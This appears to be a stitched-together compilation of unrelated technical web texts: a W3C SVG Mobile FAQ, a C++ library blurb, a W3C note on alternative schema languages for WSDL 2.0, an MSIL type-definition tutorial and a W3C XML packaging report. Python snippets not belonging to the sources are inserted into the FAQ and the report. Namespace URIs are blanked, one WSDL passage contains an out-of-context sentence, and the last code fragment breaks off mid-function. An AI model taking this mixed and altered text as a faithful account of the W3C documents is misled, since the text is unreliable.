When will we start to see SVG Mobile implementations appearing?
They have already appeared, and are already available as shipping, released products from multiple vendors including BitFlash, CSIRO, Intesis, KDDI and ZOOMON. Other implementations are in development from companies such as Ericsson, Nokia and Sharp. As an example, the ZOOMON SVG Tiny implementation runs on cellphones from Nokia and Sony Ericsson which use the Symbian operating system.
The SVG Tiny being displayed on these phones is also available: [football animation, 27k] [monster animation, 6k]
When will we start to see SVG Mobile being used in a commercial context?
Commercial services using SVG Tiny are already in use on cellphones in Japan; other countries are expected to see such services shortly.
For example, here are some shots of a real Mobile Commerce application developed by KDDI Corp. - a major Japanese cellular phone carrier and member of the SVG Working Group - in partnership with JCB Co., Ltd., Toyota Finance Corp., Mitsui Sumitomo Card Co., Ltd., and UC Card Co., Ltd. It uses the SVG Tiny implementation from KDDI running on the KDDI "au" third-generation CDMA2000 1x phones, which have color screens. The customer is shown an SVG map of the nearest participating store; in the next screen, zooming in on the map reveals more details of how to get to the store, including smaller streets not visible in the larger view; in the last shot, the opening hours and contact details of the store are displayed in SVG as the customer walks towards the store to make a purchase just before closing time.
What is the relationship of SVG Mobile to SVG 1.1?
SVG 1.1 defines the full SVG language, including some powerful features that can currently only be implemented on a desktop or laptop computer. SVG Mobile defines two subsets of SVG 1.1, taking the most commonly used functionality suitable for mobile devices.
What is the relationship of SVG Mobile to SVG Tiny and SVG Basic?
SVG Mobile is the name of the specification that defines both SVG Tiny and SVG Basic, indicating that both these profiles of SVG are primarily designed for use on mobile devices.
SVG is text based - surely that makes the files very large?
Well designed binary systems can often be compact, at least until the extensibility mechanism has been used a few times to deal with enhancements. It is also possible to design a compact yet XML-compliant syntax, and further to compress it for delivery. SVG was designed to be small, and smaller yet when compressed. Compressed files play directly in the viewer.
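The claim about compression can be illustrated with a short Python sketch (not part of the FAQ; the sample markup is invented). gzip is the compression scheme used for compressed SVG (.svgz) files:

```python
import gzip

# A small, repetitive SVG document (invented sample content).
svg = '<svg xmlns="http://www.w3.org/2000/svg" width="500" height="100">'
svg += "".join(
    f'<rect x="{i * 10}" y="10" width="8" height="8" fill="navy"/>'
    for i in range(50)
)
svg += "</svg>"

raw = svg.encode("utf-8")
compressed = gzip.compress(raw)  # this is what an .svgz file would contain

# Markup with repeated element and attribute names compresses very well.
assert len(compressed) < len(raw) / 2
# The compressed form is lossless, so a viewer can recover the original.
assert gzip.decompress(compressed) == raw
```

The exact ratio depends on the content, but the highly repetitive structure of typical SVG markup is exactly what dictionary-based compressors like gzip exploit.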
In addition, SVG uses interpolation - the automatic construction of in-between frames, similar to high-end animation systems - rather than explicitly stating the contents of each and every frame in an animation. This has a large effect on the size of the content - several mobile phone operators have cited smaller file size as a significant factor when choosing SVG Tiny over proprietary, binary alternatives - and also allows the framerate to be smoothly adjusted for the available computing power, without having to make multiple copies of the content for different devices.
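The in-betweening idea can be sketched in a few lines of Python. This is an illustration of the principle, not an SVG Tiny implementation: given only the keyframe values an animation would declare, every intermediate frame is computed on the fly, so the same content renders at any framerate.

```python
def interpolate(start, end, duration, t):
    """Linearly interpolate an animated value at time t (0 <= t <= duration)."""
    fraction = t / duration
    return start + (end - start) * fraction

# The animation declares only two keyframes: x moves from 0 to 100 over 2 seconds.
start, end, duration = 0.0, 100.0, 2.0

# A slow device might render 5 frames, a fast one 50 -- same content either way.
for fps in (5, 50):
    frames = [interpolate(start, end, duration, i * duration / fps)
              for i in range(fps + 1)]
    assert frames[0] == 0.0 and frames[-1] == 100.0

# Halfway through the animation, the value is halfway between the keyframes.
assert interpolate(start, end, duration, 1.0) == 50.0
```

Explicitly stored frames would multiply the file size by the frame count; the declarative form stays constant-size regardless of the rendered framerate.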
Is it true that all SVG Tiny content will work on an SVG Basic or SVG Full implementation?
Yes, because SVG Tiny is a strict subset of SVG Basic, which is in turn a strict subset of SVG Full, all conformant SVG Tiny, SVG Basic and SVG Full implementations will correctly display all SVG Tiny content; similarly all conformant SVG Basic and SVG Full implementations will correctly display all SVG Basic content.
Can I use languages other than English in SVG content?
Yes, SVG uses Unicode to represent text strings for display; this means that multilingual text can be displayed, searched, and indexed. It also allows convenient server-side generation and customisation of text occurring in SVG content.
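For example, a server-side script can inject multilingual text into generated SVG with any XML library. This sketch (element sizes and the helper name are invented) uses Python's standard ElementTree:

```python
import xml.etree.ElementTree as ET

SVG_NS = "http://www.w3.org/2000/svg"

def make_greeting_card(message):
    """Generate a tiny SVG document containing the given Unicode message."""
    svg = ET.Element("{%s}svg" % SVG_NS, width="240", height="60")
    text = ET.SubElement(svg, "{%s}text" % SVG_NS, x="10", y="35")
    text.text = message
    return ET.tostring(svg, encoding="unicode")

# The same generator serves Japanese, Greek or English customers.
doc = make_greeting_card("こんにちは世界")
assert "こんにちは世界" in doc

# The text survives a parse round-trip, so it can be searched and indexed.
parsed = ET.fromstring(doc)
assert parsed.find("{%s}text" % SVG_NS).text == "こんにちは世界"
```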
SVG also has its own font mechanism, allowing both creative freedom and the ability to provide fonts embedded into the content, for text in uncommon or minority languages. These fonts are not installed on the client system and disappear after the content has been viewed.
There are lots of SVG implementations - which one is the reference implementation?
Conformance to SVG is determined by the freely available and complete specification from W3C and is demonstrated by the publicly available test suite, not by the capabilities or quirks of one particular implementation from one vendor. This is a key differentiating factor of open Web Standards as opposed to closed, proprietary systems, which may have partial documentation available but which are defined by the behaviour of one implementation. It encourages market growth by enabling SVG implementors to compete on speed, footprint, quality and price without sacrificing interoperability or tying content creators and users to a single vendor.
What is the connection between Web Services and SVG?
Web Services provide the infrastructure for business-to-business (B2B) communication, and make considerable use of XML. Often, such communication is between two machines; the various Web Services specifications govern this aspect. In most cases, human interaction is also required at some point. Web Services thus need a front end for human interaction - one which is well documented, reliably implemented, and usable on a wide range of devices, as well as providing the richness of graphics and typography needed for the task and also being based on XML. SVG is a good way to provide a dynamic, interactive, graphical interface for Web Services - particularly when combined with other XML technologies such as XForms (also created by W3C).
What are 'location based services' and how does this relate to SVG Mobile?
One of the key differences between desktop and mobile uses of SVG is that mobile devices, as the name implies, move from place to place. Because of their small size and weight, they are used in a wide variety of places where a desktop or laptop computer would be inconvenient. The geographical location of the device can be determined by various means, ranging from Global Positioning System (GPS) satellites to triangulation of cellphone signals, and this information can then be used to affect the graphical display. The most familiar example of a location-aware device is probably an in-car navigation system.
Because SVG files are XML, they can contain XML in other namespaces, such as various types of metadata. As an example of such metadata, SVG which visually represents a map can contain XML metadata describing the geographical area depicted and the coordinate system used to make a flat map from a portion of the earth's curved surface. Combining this information with the location of the mobile device allows a "you are here" interactive map; combining multiple maps according to their geographic coverage allows information overlays to be built up; sending the location over the network allows geographically based queries, such as "where is the nearest hospital", to be performed. The combination of location-aware devices, location-enabled Web Services, wireless network access, and metadata-containing SVG maps with on-demand generated SVG graphics results in a location based service.
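A minimal sketch of the "you are here" idea: given metadata stating the geographic bounding box a map covers, a device position in latitude and longitude can be converted to a point on the SVG canvas. A simple equirectangular projection is assumed here; real map metadata would name its actual coordinate system, and all the numbers below are invented.

```python
def locate_on_map(lat, lon, bounds, width, height):
    """Map a lat/lon position to SVG user units, assuming an
    equirectangular projection over the stated bounding box."""
    min_lat, min_lon, max_lat, max_lon = bounds
    x = (lon - min_lon) / (max_lon - min_lon) * width
    y = (max_lat - lat) / (max_lat - min_lat) * height  # SVG y grows downward
    return x, y

# Metadata says the map covers this area, drawn on a 400x300 canvas.
bounds = (35.0, 139.0, 36.0, 140.0)   # (min_lat, min_lon, max_lat, max_lon)

# A device in the middle of the area lands in the middle of the canvas.
x, y = locate_on_map(35.5, 139.5, bounds, 400, 300)
assert (x, y) == (200.0, 150.0)
```

With this mapping in hand, a viewer only needs to draw a marker at (x, y) on top of the existing map content.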
So SVG is mainly aimed at business users?
SVG is a neutral technology. The capabilities can be used in any way, limited only by imagination. SVG can be used to display business data such as graphs of financial information or visualisation of industrial process control, but it can also be used for consumer-oriented applications such as graphics messaging and games. As an example, here is an SVG Basic implementation of the card game "blackjack".
The SVG Basic for this game is available (30k).
Do any operating environments come with SVG support?
Yes, the standard software for the Texas Instruments OMAP application platform - popular in PDAs - includes the BitFlash Mobile SVG Player & SDK. Many Linux distributions also include one or more SVG implementations, not only for viewing and authoring Web pages but increasingly also for graphical tasks in the operating system, such as resizable icons.
Do any HTML browsers come with SVG support?
Yes. Although older browsers do not have the necessary support for XML parsing and other related standards, newer browsers often provide the necessary infrastructure to support SVG. The X-Smiles browser includes SVG support, the SVG in Mozilla project is maturing, and the Konqueror browser - whose HTML renderer forms the basis of the new Apple Safari browser for Mac OS X - has an SVG component under development. For older browsers unable to support inline SVG, plug-ins are available from Adobe and Corel.
What authoring tools are available for SVG Mobile content creation?
Existing SVG authoring tools, of which there are a large number, can be used to produce SVG Mobile content provided the output is validated to the particular profile desired.
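Validation to a profile can be as simple as checking each element against the profile's vocabulary. This sketch uses a deliberately tiny, hypothetical fragment of the SVG Tiny element list; the real profile is defined by the SVG Mobile specification:

```python
import xml.etree.ElementTree as ET

# Hypothetical fragment of the SVG Tiny vocabulary, for illustration only.
TINY_ELEMENTS = {"svg", "g", "rect", "circle", "path", "text", "animate"}

def non_conformant(svg_source):
    """Return the element names in the document that fall outside the profile."""
    bad = set()
    for el in ET.fromstring(svg_source).iter():
        name = el.tag.split("}")[-1]          # strip the namespace part
        if name not in TINY_ELEMENTS:
            bad.add(name)
    return bad

doc = ('<svg xmlns="http://www.w3.org/2000/svg">'
       '<rect width="10" height="10"/><filter id="f"/></svg>')

# "filter" is not in the subset, so an authoring tool would flag it.
assert non_conformant(doc) == {"filter"}
```

A real validator would also check attributes and attribute values, but the principle of flagging non-conformant portions for replacement is the same.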
Specific authoring solutions for SVG Mobile are also available. BitFlash Brilliance (shown below) is one such application. It provides three synchronized views of the SVG being generated - visual (graphical), DOM (structural) and the actual source code. Content can be validated to SVG Tiny or SVG Basic, and non-conformant portions are highlighted so that they can be replaced or altered. Graphical previews, using an emulator, show what the content will look like on any desired screen size and color depth.
KDDI have announced a Mobile SVG authoring plugin (shown at right, below) for Adobe Illustrator, allowing a familiar authoring environment to be used to create SVG Mobile content.
Data-driven graphics for Web Services benefit from specialist authoring tools. Corel have announced a Smart Graphics suite of authoring tools especially aimed at this market segment.
ZOOMON have an SVG authoring tool, ZOOMON Composer, for SVG Tiny animations, with a simple, easy-to-use interface; e-animator from Sharp is another authoring application that reads SVG files and calculates the in-between geometry of an animation.
Highly interactive SVG solutions often use scripting. Intesis, who make an SVG Basic implementation for PocketPC, also produce a JavaScript Integrated Development Environment (IDE), allowing code to be developed on a PC, then debugged step by step on the target mobile device connected to the PC with a synchronisation cable, before deploying the solution on SVG Basic players from BitFlash, CSIRO, or Intesis.

Source: http://www.w3.org/2003/01/svg11-faq.html
This is my own collection of useful C++ classes and templates, gathered from past job experience, personal wish lists, and other open-source projects that I have partially forked.

The code begins with some support classes around the Oracle database, and I am also recovering earlier work on concurrency and network programming. The classes are structured into the following libraries and namespaces:
The base library: libaah
This is the base library for common functionality around the OS, data structures, DBMS access and more. Some parts of this library will be spun off into separate libraries of their own; for now, it has the following namespaces:
- The aah::os namespace, which is the root of all the OS abstractions.
- The aah::common namespace, with basic services for all kinds of applications.
- The aah::nio namespace, which will contain code for networking and I/O operations.
- The aah::dbms::oracle namespace, which will contain code for database access and monitoring.

Source: http://code.google.com/p/aahora/
This document is also available in these non-normative formats: PDF, PostScript, XML, and plain text.
Copyright © 2005 W3C® (MIT, ERCIM, Keio), All Rights Reserved. W3C liability, trademark and document use rules apply.
This document captures the result of discussions by the Web Services Description Working Group regarding WSDL 2.0 type system extensibility at the time of its publication. The Working Group normatively defines the use of XML Schema 1.0 as a type system in the WSDL 2.0 Core specification. This document sketches out the basics of extensions for Document Type Definitions (DTDs) and RELAX NG. It was produced by the Web Services Description Working Group, which is part of the Web Services Activity.
The material in this note was previously published as an Appendix of the Web Services Description Language (WSDL) 2.0: Core Language Last Call specification. In response to Last Call comments, the Working Group agreed to remove this material from that specification and publish it separately as a Working Group Note. Current versions of WSDL 2.0 Core no longer contain this material. This publication differs from the previous material in that it also includes some expanded discussion of issues that should be given consideration by type system extension designers.
No further work on this topic is planned at this point. Errors in this document can be reported to the public public-ws-desc-comments mailing list.
1. Introduction
2. Issues facing multiple schema languages/type systems
3. Examples of Specifications of Extension Elements for Alternative Schema Language Support
3.1 DTD
3.1.1 namespace attribute information item
3.1.2 location attribute information item
3.1.3 References to Element Definitions
3.2 RELAX NG
3.2.1 Importing RELAX NG
3.2.1.1 ns attribute information item
3.2.1.2 href attribute information item
3.2.2 Embedding RELAX NG
3.2.2.1 ns attribute information item
3.2.3 References to Element Declarations
A. References
B. Acknowledgements (Non-Normative)
WSDL 2.0: Core Language [WSDL 2.0 Core] describes Web Service interaction in terms of exchanges of typed messages. WSDL only provides general support for type systems based on the XML Infoset [XML Information Set] and specific support for the W3C XML Schema Description Language [XML Schema: Structures]. Describing messages with WSDL using schema languages other than XML Schema or non-XML Infoset type systems requires extending the WSDL component model. While the Web Services Description Working Group has not defined any such extensions, there were discussions in the Working Group about how those extensions might be defined and used. This document is the result of those discussions and captures part of the Working Group's thinking about schema language and type system extensibility at the time of its publication. The discussions also suggested a further general possibility: being able to define a union type (or other compound type) that spans distinct type systems, where part of the content is specified with an XML Schema. This example is a little artificial, as the Data Access Working Group could easily describe the entire results format in Relax NG.
The first interpretation is most in the spirit of WSDL and was strongly preferred by the Working Group. Since WSDL extensibility points are generally quite unrestricted, the Working Group did not try to enforce the first option, but the general belief of the Working Group was that the other options were confusing and unwise.
This section contains two examples of specifications of extension elements for alternative schema language support. Please note that those examples did not receive any implementation testing.
A Document Type Definition (DTD) as defined in [XML 1.0] may be used as the schema language for WSDL. It may not be embedded; it must be imported. A namespace must be assigned. DTD types appear in the {element declarations} property of the Description component and may be referenced from the wsdl:input, wsdl:output and wsdl:fault elements using the element attribute information item.
The prefix dtd, used throughout the following, is mapped to the namespace URI "".
The dtd:import element information item references an external Document Type Definition, and has the following Infoset properties:
A [local name] of import.
A [namespace name] of "".
One or two attribute information items, as follows:
A REQUIRED namespace attribute information item as described below.
An OPTIONAL location attribute information item as described below.
namespace attribute information item
The namespace attribute information item sets the namespace to be used with all imported element definitions described in the DTD. It has the following Infoset properties:
A [local name] of namespace.
A [namespace name] which has no value.
The type of the namespace attribute information item is xs:anyURI.
The WSDL author should ensure that a prefix is associated with the namespace at the proper scope (probably document scope).
location attribute information item
The location attribute information item, if present, provides a hint to the processor as to where the DTD may be located. Caching and cataloging technologies may provide better information than this hint. The location attribute information item has the following Infoset properties:
A [local name] of location.
A [namespace name] which has no value.
The type of the location attribute information item is xs:anyURI.
The element attribute information item MUST be used when referring to an element definition (<!ELEMENT>) from an Interface Message Reference component; referring to an element definition from an Interface Fault component is similar. The namespace name of the reference MUST correspond to the content of the namespace attribute information item of the dtd:import element information item, and the local name part must correspond to an element defined in the DTD.
Note that this pattern does not attempt to make DTDs namespace-aware. It applies namespaces externally, in the import phase.
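A sketch of how a processor might resolve such an element reference: the prefix of the QName in the element attribute is looked up in the in-scope namespace declarations, the result is checked against the namespace declared on dtd:import, and the local part must name an element declared in the DTD. All names and URIs here are invented for illustration.

```python
def resolve_dtd_element(qname, prefix_map, import_namespace, dtd_elements):
    """Resolve an element="p:name" reference against a dtd:import.
    Returns the local element name, or raises if the reference is invalid."""
    prefix, _, local = qname.partition(":")
    namespace = prefix_map[prefix]
    if namespace != import_namespace:
        raise ValueError("QName namespace does not match the dtd:import")
    if local not in dtd_elements:
        raise ValueError("no such <!ELEMENT> declaration: " + local)
    return local

# Invented example: a DTD imported under an invented namespace,
# declaring <!ELEMENT house ...> and <!ELEMENT room ...>.
prefix_map = {"h": "http://example.com/houses"}
dtd_elements = {"house", "room"}

assert resolve_dtd_element("h:house", prefix_map,
                           "http://example.com/houses", dtd_elements) == "house"
```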
A RELAX NG [Relax NG] schema may be used as the schema language for WSDL. It may be embedded or imported; import is preferred. A namespace must be specified; if an imported schema specifies one, then the [actual value] of the ns attribute information item in the include element information item must match the specified namespace. RELAX NG provides both type definitions and element declarations; the latter appear in the {element declarations} property of the Description component. The following discussion uses the prefix rng, which is mapped to the URI "".
Importing a RELAX NG schema uses the rng:include mechanism defined by RNG, with restrictions on its syntax and semantics. A child element information item of the types element information item is defined with the following Infoset properties:
A [local name] of include.
A [namespace name] of "".
Two attribute information items as follows:
A REQUIRED ns attribute information item as described below.
An OPTIONAL href attribute information item as described below.
Additional attribute information items as defined by the RNG specification.
Note that WSDL restricts the rng:include element information item to be empty. That is, it cannot redefine rng:start and rng:define element information items; it may be used solely to import a schema.
ns attribute information item
The ns attribute information item defines the namespace of the type and element definitions imported from the referenced schema. If the referenced schema contains an ns attribute information item on its grammar element information item, then the values of these two attribute information items must be identical. If the imported grammar does not have an ns attribute information item then the namespace specified here is applied to all components of the schema as if it did contain such an attribute information item. The ns attribute information item has the following Infoset properties:
A [local name] of ns.
A [namespace name] which has no value.
The type of the ns attribute information item is xs:anyURI.
href attribute information item
The href attribute information item must be present, according to the rules of the RNG specification. However, WSDL allows it to be empty, and considers it only a hint. Caching and cataloging technologies may provide better information than this hint. The href attribute information item has the following Infoset properties:
A [local name] of href.
A [namespace name] which has no value.
The type of the href attribute information item is xs:anyURI.
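Putting the two attributes together, a processor might handle a wsdl:types section importing a RELAX NG schema as sketched below. The instance markup and the example.com namespace are invented; the RELAX NG namespace used for the prefix is the standard one.

```python
import xml.etree.ElementTree as ET

RNG_NS = "http://relaxng.org/ns/structure/1.0"  # the standard RELAX NG namespace

types = ET.fromstring(
    '<types xmlns:rng="%s">'
    '<rng:include ns="http://example.com/po" href="po.rng"/>'
    '</types>' % RNG_NS
)

include = types.find("{%s}include" % RNG_NS)

# ns is required; href may be empty and is only a hint.
ns = include.get("ns")
href = include.get("href", "")
assert ns == "http://example.com/po"
assert href == "po.rng"

# WSDL requires the rng:include element to be empty (no redefinitions).
assert len(include) == 0
```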
Embedding an RNG schema uses the existing top-level rng:grammar element information item. It may be viewed as simply cutting and pasting an existing, stand-alone schema to a location inside the wsdl:types element information item. The rng:grammar element information item has the following Infoset properties:
A [local name] of grammar.
A [namespace name] of "".
A REQUIRED ns attribute information item as described below.
Additional attribute information items as specified for the rng:grammar element information item in the RNG specification.
Child element information items as specified for the rng:grammar element information item in the RNG specification.
ns attribute information item
The ns attribute information item defines the namespace of the type and element definitions embedded in this schema. WSDL modifies the RNG definition of the rng:grammar element information item to make this attribute information item required. The ns attribute information item has the following Infoset properties:
A [local name] of ns.
A [namespace name] which has no value.
The type of the ns attribute information item is xs:anyURI.
Whether embedded or imported, the element definitions present in a schema may be referenced from an Interface Message Reference or Interface Fault component.
A named rng:define definition MUST NOT be referenced from the Interface Message Reference or Interface Fault components.
A named RELAX NG element declaration MAY be referenced from an Interface Message Reference or Interface Fault component. The QName is constructed from the namespace (the ns attribute information item) of the schema and the content of the name attribute information item of the element element information item. An element attribute information item MUST NOT be used to refer to an rng:define element information item.
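The QName construction described above can be sketched directly: pair the schema's ns value with the name attribute of each element pattern, while rng:define patterns yield nothing referenceable. The grammar content and example.com namespace are invented; the RELAX NG namespace is the standard one.

```python
import xml.etree.ElementTree as ET

RNG_NS = "http://relaxng.org/ns/structure/1.0"  # standard RELAX NG namespace

grammar = ET.fromstring(
    '<grammar xmlns="%s" ns="http://example.com/po">'
    '<start><element name="purchaseOrder"><empty/></element></start>'
    '<define name="helper"><empty/></define>'
    '</grammar>' % RNG_NS
)

schema_ns = grammar.get("ns")

# Only element declarations yield referenceable QNames; defines do not.
qnames = [(schema_ns, el.get("name"))
          for el in grammar.iter("{%s}element" % RNG_NS)]

assert qnames == [("http://example.com/po", "purchaseOrder")]
```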
This document is the work of the W3C Web Service Description Working Group.
Members of the Working Group at the time of writing included Asir Vedamuthu (Microsoft Corporation), among others; discussions on www-ws-desc@w3.org are also gratefully acknowledged.

Source: http://www.w3.org/TR/wsdl20-altschemalangs/
In this installment of the MSIL series, I describe how types are defined.
Here is a minimal reference type called House. As I write this, we are looking for a house in British Columbia, so this was the first thing that came to mind.
.class Kerr.RealEstate.House
{
    .method public void .ctor()
    {
        .maxstack 1
        ldarg.0 // push "this" instance onto the stack
        call instance void [mscorlib]System.Object::.ctor()
        ret
    }
}
This is a very simple type. Note that you must declare a constructor for a concrete reference type. Unlike languages like C# and C++, the IL assembler will not generate a constructor for you automatically.
Types are defined using the .class directive followed by a type header. The class keyword is used instead of the more intuitive type for historical reasons. When you read class in MSIL source code, just think type. The type header consists of a number of type attributes followed by the name of the type you are defining. To define the equivalent of a C# static class in MSIL you can write the following.
.class abstract sealed Kerr.RealEstate.MortgageCalculator
{
    /* members */
}
abstract and sealed are the type attributes. An abstract type cannot be instantiated and a sealed type cannot have sub-types. There are attributes to control visibility, such as public and private. There are attributes to control field layout, such as auto and sequential. For a complete list of attributes please consult the CLI specification. Many attributes are applied automatically, which can save you a lot of typing. Fortunately these defaults are quite intuitive so you should become familiar with them quickly. As an example, extending the System.ValueType from the mscorlib assembly defines a value type. Since the CLI requires that value types be sealed, the IL assembler will automatically add this attribute for you.
The name of the type in the example above is Kerr.RealEstate.MortgageCalculator. The CLI does not recognize namespaces as a distinct concept. Rather the full type name is always used. The syntax shown above is only supported by the IL Assembler that ships with version 2.0 of the .NET Framework. If you are working with version 1.x then you need to group your namespace members with a .namespace directive, as shown below. Note that this syntax is also supported in version 2.0.
.namespace Kerr.RealEstate
{
    .class abstract sealed MortgageCalculator
    {
        /* members */
    }
}
Following the type name you have the option of specifying the base type. The extends keyword is used for this purpose. If no base type is specified, the IL assembler will add the extends clause to make the type inherit from the System.Object type from the mscorlib assembly, resulting in a reference type. And finally, the type header can provide a list of interfaces that the type and its descendants will implement and satisfy, becoming the interfaces of the type.
.class Kerr.RealEstate.RoomList
    extends [System.Windows.Forms]System.Windows.Forms.ListView
    implements Kerr.IView
{
    /* members */
}
In this example, the Kerr.RealEstate.RoomList type has System.Windows.Forms.ListView, defined in the System.Windows.Forms assembly, as its base type. Keep in mind that the CLI requires that every user-defined type extend exactly one other type. The RoomList type also implements the Kerr.IView interface type.
With this basic introduction to type definitions, you should now be able to start defining more interesting types. To define an interface, simply use the interface attribute in your type header. If you want a value type, known as a struct in C#, simply extend the System.ValueType type from the mscorlib assembly. Now you should be able to see why the .class directive is perhaps not the best name for it.
.class interface Kerr.IView
{
    /* members */
}
.class Kerr.RealEstate.HouseData extends [mscorlib]System.ValueType
{
    /* members */
}
Read part 4 now: Defining Type Members
© 2004 Kenny Kerr
Thank you!
If I write code directly in MSIL, will it have better performance than code written in C#?
Kim: In general the performance will be comparable. Keep in mind that C# simply produces IL. So assuming the C# compiler generates the best possible code, the performance should be the same. If you're concerned about performance you may want to consider the Visual C++ 2005 compiler, which tends to produce slightly more efficient code due to more advanced optimizations, but the difference is negligible in most cases.

Source: http://weblogs.asp.net/kennykerr/archive/2004/09/09/227316.aspx
Copyright © 1999 W3C (MIT, INRIA, Keio), All Rights Reserved. W3C liability, trademark, document use and software licensing rules apply.
A specification that describes how to bundle XML and related files into a package for storage or transmission has been under discussion for quite some time. This report endeavors to capture the scope, problems and benefits that such a specification should encompass.
This Report is made available by W3C for discussion only. This indicates no endorsement of its content, nor that W3C has had any editorial control in its preparation, nor that W3C has, is, or will be allocating any resources to the issues addressed by the Report.
This report was made available to the W3C membership in 1999, and was released to the public in July 2000.
This report was made in order to deliver a study that was promised in the Briefing Package: Continuing work on XML. The relevant excerpt from the Briefing Package states:
"XML documents are also expected to be compound; they may consist of several
entities, along with associated style sheets, scripts etc. While there are
a number of existing packaging mechanisms (MIME multipart, zip, tar, ...)
that can be used to aggregate them, recommending one in particular or perhaps
designing an XML-specific packaging mechanism may enhance interoperability
and deployment of XML. Rather than chartering a deliverable to address this
issue, we propose to deliver a study on the issue in the form of a Note."
-- Dan Connolly, W3C XML Activity Lead
There is a great need for a general-purpose packaging mechanism for XML and related files. Several use cases were gathered from members of the XML activity and other related Working Groups over the last few years. One of them, incremental processing, allows content to be acted on as it is received: for early display, content checking and terminating the transmission. From this we get a much more efficient transmission scheme.
So, what is really needed is a W3C REC that describes a general purpose, flexible, powerful and highly interoperable mechanism for collecting files into a group, adding metadata about the relationships between files, compressing, encrypting, authenticating, dynamically transmitting, processing incrementally, packaging and randomly accessing XML and related files. The idea is to invent new technology only when existing technology will not meet the needs of a Packaging Specification. Having the specification define which existing and new technologies will be used for XML Packaging supports the need for true interoperability.
Since a Collection is a grouping of Components, while a Package takes the same group of Components and packages them into one file, it can be observed that there is utility in both the packaged and the unpackaged form. There is even greater utility if it is easy to covert between packaged and unpackaged forms and vice versa.
Consider briefly how these two forms can be put to use in a client/server environment:
1. Single Package at server, multiple files at client -- decomposition at the server or at the client.
2. Single Package at server, single Package at client -- client downloads complete Package.
3. Multiple files at server, multiple files at client -- client pulls only those pieces needed, no decomposition needed at server or client.
4. Multiple files at server, single Package file at client -- client downloads complete Collection, composition at client.
Since all four scenarios have their uses, it would be very powerful if the packaging mechanism supported both the packaged and unpackaged forms. This "mode-neutrality" allows servers and clients to not care whether a Collection is packaged or not, because they can convert between modes efficiently. This distinction in processing the two representations should be confined to a basic "access level" and hidden at higher levels. Or put another way, given that there are two representations it must be possible to keep that reality as localized as possible within the processing application.
Naming conventions for Components in Collections should obey standard URL (or URI) naming conventions to facilitate this agnosticism to representation when processing. The URL for a Component within a Package should be the same as the URL for the Component if the Collection was not packaged. Moreover, to be consistent the Components must be able to refer to each other, whether the links are relative or absolute, in a uniform way whether they are separate or packaged (i.e., using base-relative URLs, where the base is the URL for the Package). Prototyping shows that this is fairly easy to achieve.
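The convention can be sketched with standard URL resolution: a Component's address is the same relative reference resolved against the Collection's base, whether that base is a plain directory or a Package URL. Treating the Package URL as a base ending in "/" is an assumption of this sketch, and all the URLs are invented.

```python
from urllib.parse import urljoin

# Unpackaged: the Collection is a directory of files on a server.
unpackaged_base = "http://example.com/report/"
# Packaged: the Package addressed so the same relative references resolve
# inside it (assumption of this sketch).
packaged_base = "http://example.com/report.pkg/"

for base in (unpackaged_base, packaged_base):
    index = urljoin(base, "index.xml")
    chapter = urljoin(base, "chapters/ch1.xml")
    # A relative link inside ch1.xml resolves the same way in both modes,
    # so Components can refer to each other without knowing the mode.
    image = urljoin(chapter, "../images/fig1.svg")
    assert image == base + "images/fig1.svg"
```

This is exactly the "mode-neutrality" the text describes: higher layers only ever see base-relative URLs.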
Given that one might want to efficiently serve up Components of a Package as multiple individual files, random access of a Component within a Collection is needed. Once the Index has been processed, it must be possible to extract a Component file from a Package without processing the other Components in any way, including just passing over them.
This shows the need for a Collection to have an Index that refers to all of the Components in the Collection, whether packaged or not, and gives file-system-like information about each one. The form of the Index would be part of the specification. As will be shown, the Index must not be combined with the Manifest: there are cases where an Index may not exist in a Package, while a Manifest will always be needed. Choosing a standard naming convention for the Index will make it easy to find automatically.
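The random access that such an Index enables can be sketched as follows (a toy byte layout invented for illustration; the real Index format would be defined by the specification):

```python
def write_package(components):
    """Build a toy Package: a fixed-width header length, an Index
    of 'name offset length' lines, then the raw Component bytes."""
    index, body, offset = [], b"", 0
    for name, data in components.items():
        index.append(f"{name} {offset} {len(data)}")
        body += data
        offset += len(data)
    header = ("\n".join(index) + "\n").encode()
    return f"{len(header):08d}".encode() + header + body

def read_component(package, name):
    """Extract one Component by slicing straight to its bytes,
    without touching or even scanning the other Components."""
    hlen = int(package[:8])
    index = {}
    for line in package[8:8 + hlen].decode().splitlines():
        n, off, length = line.rsplit(" ", 2)
        index[n] = (int(off), int(length))
    start = 8 + hlen + index[name][0]
    return package[start:start + index[name][1]]
```

Once the Index is parsed, each Component is addressed by an absolute offset, which is what makes serving individual Components out of a Package cheap.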
Beyond the basic information required in the Index, there is a great need to associate Components with other Components, with files outside the Collection, and with other metadata. This additional information makes many applications of XML Packaging much more powerful. Michael Sperberg-McQueen summarized this requirement after a discussion of the topic with Dan Connolly, Tim Berners-Lee and Bert Bos.
The Association metadata will be stored in a special Component called the Manifest, whose content is written in an XML language defined for that purpose. It is essential that this information be in a separate Component from the Index and other Components, and not be built into the packaging mechanism itself; this leaves the Manifest available to both the packaged and the unpackaged Collection. A standardized naming convention is needed for this Component.
The specification will need to define an XML tagset with its own namespace. The definition of a DTD, an XML Schema, or an RDF vocabulary for this tagset would be most helpful to specify exactly what kinds of metadata the Collection should be able to associate, and the semantics required by applications supporting this mechanism. The only tags defined should be ones that would be of broad general use to XML applications. This area of work could be a real time sink unless the tags defined in the Manifest are kept at a high level. More specific tags should be added to the Manifest via an extensibility mechanism for application-specific information.
The information that may be associated includes:
For interoperability, an easily extensible XML language will be defined for the contents of the Manifest. It is a contract among implementers of the specification as to what applications will do with the information supplied in the Manifest. The extensibility of the Manifest language will allow specific applications to add their own tags, though there is no guarantee that such tags will be interpreted by fully compliant XML Packaging clients or servers. What follows is an example of what a Manifest file could look like:
<XMLPackagingManifest xmlns="">
  <maindoc href="??">
    <stylesheet href="?"/>
    <stylesheet href="?"/>
    <schema type="Schema" href="?"/>
  </maindoc>
  . . .
</XMLPackagingManifest>
Web servers are increasingly generating information dynamically. Web Clients need to process much of their information incrementally. Support for dynamically generated information and incremental processing in the Packaging specification would make the specification much more useful.
For example, one could first create and write the Package on a server disk, then transmit it, and finally erase it. But by simply skipping the file storage step and sending the data along as it is created, sequentially, as if it were a Package file transfer, we get a much more efficient scheme. This works because writing the file is normally done sequentially, which is the same order as needed for transmission. On the client side, incremental processing can begin as the Package is received, allowing earlier display or earlier hand-off of the information to a particular application. Interfaces are available to de-couple the file reading from the transmission and fake the file reading.
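The scheme just described, serving a Package that never exists as a file and consuming it incrementally, can be sketched as follows (a toy frame format invented for illustration):

```python
def stream_package(make_components):
    """Server side: yield Package bytes as each Component is
    produced -- nothing is ever written to disk."""
    for name, produce in make_components:
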